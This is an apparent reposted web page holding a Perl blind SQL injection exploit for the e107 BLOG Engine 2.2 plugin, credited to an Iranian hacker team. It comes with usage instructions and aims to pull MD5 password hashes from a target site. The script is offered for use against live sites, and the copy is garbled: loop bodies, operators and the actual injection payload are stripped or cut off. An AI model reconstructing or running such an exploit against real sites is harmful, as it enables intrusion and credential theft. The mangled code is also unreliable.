e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit
e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit
发布时间:2016-02-19 来源:查字典编辑
摘要:#!/usr/bin/perl#######################################################...

#!/usr/bin/perl

#####################################################################################

# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #

# ..::virangar security team::.. #

# #

# C0d3d BY:virangar security team ( hadihadi ) #

#special tnx to: #

#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #

#& all virangar members & all hackerz #

# my lovely friends hadi_aryaie2004 & arash(imm02tal) #

# ..:::Young Iranina Hackerz::.. #

#####################################################################################

#[-] note: becuse e107 using diffrent prefix/table names may it's not work good,but i wrote it for default mod ;)

#this code is for english e107's only,if you want work on other languages,you can edit line 67;)use HTTP::Request;

use LWP::UserAgent;if (@ARGV != 1){

header();

}$host = $ARGV[0];print "n md5 Password:rn";

print "n[ ]Donen";

sub halghe {

for($i = 1; $i request(HTTP::Request-new(GET=$attack));

$res = $req-if ($res !~ /The user has hidden their blog./i){

return 1;

}}

sub header {

print qq{

###################################################################

# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #

# (just for english e107's) #

# #

# Useage: perl $0 Host #

# #

# Host: full patch to macgurublog.php uid (dont forget ) #

# #

# Example: #

# perl $0 site/macgurublog_menu/macgurublog.php?uid=5 #

# #

###################################################################

};

}

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新电脑安全教程学习
热门电脑安全教程学习
电脑子分类